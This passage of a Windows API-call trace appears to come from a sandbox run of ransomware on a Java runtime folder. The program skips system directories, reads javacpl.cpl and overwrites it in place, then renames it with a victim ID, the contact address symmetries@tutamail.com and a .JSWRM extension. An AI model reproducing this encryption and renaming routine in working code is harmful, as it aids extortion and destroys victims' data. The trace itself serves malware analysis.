returned 0x209878 [0069.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.478] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="java-rmi.exe", cAlternateFileName="")) returned 1 [0069.478] lstrcmpiW (lpString1="java-rmi.exe", lpString2=".") returned 1 [0069.478] lstrcmpiW (lpString1="java-rmi.exe", lpString2="..") returned 1 [0069.478] lstrcmpiW (lpString1="java-rmi.exe", lpString2="...") returned 1 [0069.478] lstrcmpiW (lpString1="java-rmi.exe", lpString2="windows") returned -1 [0069.478] lstrcmpiW (lpString1="java-rmi.exe", lpString2="recovery") returned -1 [0069.478] lstrcmpiW (lpString1="java-rmi.exe", lpString2="perflogs") returned -1 [0069.478] lstrcmpiW (lpString1="java-rmi.exe", lpString2="documents and settings") returned 1 [0069.478] lstrcmpiW (lpString1="java-rmi.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.478] lstrcmpiW (lpString1="java-rmi.exe", lpString2="system volume information") returned -1 [0069.478] lstrcmpiW (lpString1="java-rmi.exe", lpString2="msocache") returned -1 [0069.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0069.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java-rmi.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java-rmi.exe", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java-rmi.exe", lpUsedDefaultChar=0x0) returned 12 [0069.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0069.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java-rmi.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java-rmi.exe", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java-rmi.exe", lpUsedDefaultChar=0x0) returned 12 [0069.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0069.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.479] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="java.dll", cAlternateFileName="")) returned 1 [0069.479] lstrcmpiW (lpString1="java.dll", lpString2=".") returned 1 [0069.479] lstrcmpiW (lpString1="java.dll", lpString2="..") returned 1 [0069.479] lstrcmpiW (lpString1="java.dll", lpString2="...") returned 1 [0069.479] lstrcmpiW (lpString1="java.dll", lpString2="windows") returned -1 [0069.479] lstrcmpiW (lpString1="java.dll", lpString2="recovery") returned -1 [0069.479] lstrcmpiW (lpString1="java.dll", lpString2="perflogs") returned -1 [0069.479] lstrcmpiW (lpString1="java.dll", lpString2="documents and settings") returned 1 [0069.479] lstrcmpiW (lpString1="java.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.479] lstrcmpiW (lpString1="java.dll", lpString2="system volume information") returned -1 [0069.479] lstrcmpiW (lpString1="java.dll", lpString2="msocache") returned -1 [0069.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.dll", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java.dll", lpUsedDefaultChar=0x0) returned 8 [0069.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0069.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.dll", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java.dll", lpUsedDefaultChar=0x0) returned 8 [0069.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0069.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0069.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0069.479] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32840, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="java.exe", cAlternateFileName="")) returned 1 [0069.479] lstrcmpiW (lpString1="java.exe", lpString2=".") returned 1 [0069.479] lstrcmpiW (lpString1="java.exe", lpString2="..") returned 1 [0069.479] lstrcmpiW (lpString1="java.exe", lpString2="...") returned 1 [0069.479] lstrcmpiW (lpString1="java.exe", lpString2="windows") returned -1 [0069.479] lstrcmpiW (lpString1="java.exe", lpString2="recovery") returned -1 [0069.479] lstrcmpiW (lpString1="java.exe", lpString2="perflogs") returned -1 [0069.480] lstrcmpiW (lpString1="java.exe", lpString2="documents and settings") returned 1 [0069.480] lstrcmpiW (lpString1="java.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.480] lstrcmpiW (lpString1="java.exe", lpString2="system volume information") returned -1 [0069.480] lstrcmpiW (lpString1="java.exe", lpString2="msocache") returned -1 [0069.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.exe", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java.exe", lpUsedDefaultChar=0x0) returned 8 [0069.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java.exe", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java.exe", lpUsedDefaultChar=0x0) returned 8 [0069.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0069.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0069.480] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x22c40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="JavaAccessBridge-64.dll", cAlternateFileName="JAVAAC~1.DLL")) returned 1 [0069.480] lstrcmpiW (lpString1="JavaAccessBridge-64.dll", lpString2=".") returned 1 [0069.480] lstrcmpiW (lpString1="JavaAccessBridge-64.dll", lpString2="..") returned 1 [0069.480] lstrcmpiW (lpString1="JavaAccessBridge-64.dll", lpString2="...") returned 1 [0069.480] lstrcmpiW (lpString1="JavaAccessBridge-64.dll", lpString2="windows") returned -1 [0069.480] lstrcmpiW (lpString1="JavaAccessBridge-64.dll", lpString2="recovery") returned -1 [0069.480] lstrcmpiW (lpString1="JavaAccessBridge-64.dll", lpString2="perflogs") returned -1 [0069.480] lstrcmpiW (lpString1="JavaAccessBridge-64.dll", lpString2="documents and settings") returned 1 [0069.480] lstrcmpiW (lpString1="JavaAccessBridge-64.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.480] lstrcmpiW (lpString1="JavaAccessBridge-64.dll", lpString2="system volume information") returned -1 [0069.480] lstrcmpiW (lpString1="JavaAccessBridge-64.dll", lpString2="msocache") returned -1 [0069.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JavaAccessBridge-64.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0069.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JavaAccessBridge-64.dll", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JavaAccessBridge-64.dll", lpUsedDefaultChar=0x0) returned 23 [0069.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JavaAccessBridge-64.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0069.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JavaAccessBridge-64.dll", cchWideChar=23, lpMultiByteStr=0x240fc0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JavaAccessBridge-64.dll", lpUsedDefaultChar=0x0) returned 23 [0069.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0069.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0069.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.481] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2dc00, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="javacpl.cpl", cAlternateFileName="")) returned 1 [0069.481] lstrcmpiW (lpString1="javacpl.cpl", lpString2=".") returned 1 [0069.481] lstrcmpiW (lpString1="javacpl.cpl", lpString2="..") returned 1 [0069.481] lstrcmpiW (lpString1="javacpl.cpl", lpString2="...") returned 1 [0069.481] lstrcmpiW (lpString1="javacpl.cpl", lpString2="windows") returned -1 [0069.481] lstrcmpiW (lpString1="javacpl.cpl", lpString2="recovery") returned -1 [0069.481] lstrcmpiW (lpString1="javacpl.cpl", lpString2="perflogs") returned -1 [0069.481] lstrcmpiW (lpString1="javacpl.cpl", lpString2="documents and settings") returned 1 [0069.481] lstrcmpiW (lpString1="javacpl.cpl", lpString2="$RECYCLE.BIN") returned 1 [0069.481] lstrcmpiW (lpString1="javacpl.cpl", lpString2="system volume information") returned -1 [0069.481] lstrcmpiW (lpString1="javacpl.cpl", lpString2="msocache") returned -1 [0069.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javacpl.cpl", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javacpl.cpl", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javacpl.cpl", lpUsedDefaultChar=0x0) returned 11 [0069.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0069.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javacpl.cpl", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javacpl.cpl", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javacpl.cpl", lpUsedDefaultChar=0x0) returned 11 [0069.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0069.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0069.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.482] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.482] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=187392) returned 1 [0069.482] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.482] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0069.495] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.495] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0069.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.656] CloseHandle (hObject=0x454) returned 1 [0069.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0069.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0069.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0069.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0069.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216ac0 [0069.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0069.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216ac0 | out: hHeap=0x1e0000) returned 1 [0069.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.656] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0069.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0069.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.693] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13a40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="javacpl.exe", cAlternateFileName="")) returned 1 [0069.694] lstrcmpiW (lpString1="javacpl.exe", lpString2=".") returned 1 [0069.694] lstrcmpiW (lpString1="javacpl.exe", lpString2="..") returned 1 [0069.694] lstrcmpiW (lpString1="javacpl.exe", lpString2="...") returned 1 [0069.694] lstrcmpiW (lpString1="javacpl.exe", lpString2="windows") returned -1 [0069.694] lstrcmpiW (lpString1="javacpl.exe", lpString2="recovery") returned -1 [0069.694] lstrcmpiW (lpString1="javacpl.exe", lpString2="perflogs") returned -1 [0069.694] lstrcmpiW (lpString1="javacpl.exe", lpString2="documents and settings") returned 1 [0069.694] lstrcmpiW (lpString1="javacpl.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.694] lstrcmpiW (lpString1="javacpl.exe", lpString2="system volume information") returned -1 [0069.694] lstrcmpiW (lpString1="javacpl.exe", lpString2="msocache") returned -1 [0069.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javacpl.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javacpl.exe", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javacpl.exe", lpUsedDefaultChar=0x0) returned 11 [0069.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javacpl.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javacpl.exe", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javacpl.exe", lpUsedDefaultChar=0x0) returned 11 [0069.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0069.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.694] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x10e40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="javafx_font.dll", cAlternateFileName="JAVAFX~1.DLL")) returned 1 [0069.694] lstrcmpiW (lpString1="javafx_font.dll", lpString2=".") returned 1 [0069.694] lstrcmpiW (lpString1="javafx_font.dll", lpString2="..") returned 1 [0069.694] lstrcmpiW (lpString1="javafx_font.dll", lpString2="...") returned 1 [0069.694] lstrcmpiW (lpString1="javafx_font.dll", lpString2="windows") returned -1 [0069.694] lstrcmpiW (lpString1="javafx_font.dll", lpString2="recovery") returned -1 [0069.694] lstrcmpiW (lpString1="javafx_font.dll", lpString2="perflogs") returned -1 [0069.694] lstrcmpiW (lpString1="javafx_font.dll", lpString2="documents and settings") returned 1 [0069.694] lstrcmpiW (lpString1="javafx_font.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.694] lstrcmpiW (lpString1="javafx_font.dll", lpString2="system volume information") returned -1 [0069.694] lstrcmpiW (lpString1="javafx_font.dll", lpString2="msocache") returned -1 [0069.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0069.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx_font.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx_font.dll", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javafx_font.dll", lpUsedDefaultChar=0x0) returned 15 [0069.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0069.695] RtlAllocateHeap (HeapHandle=0x1e0000, 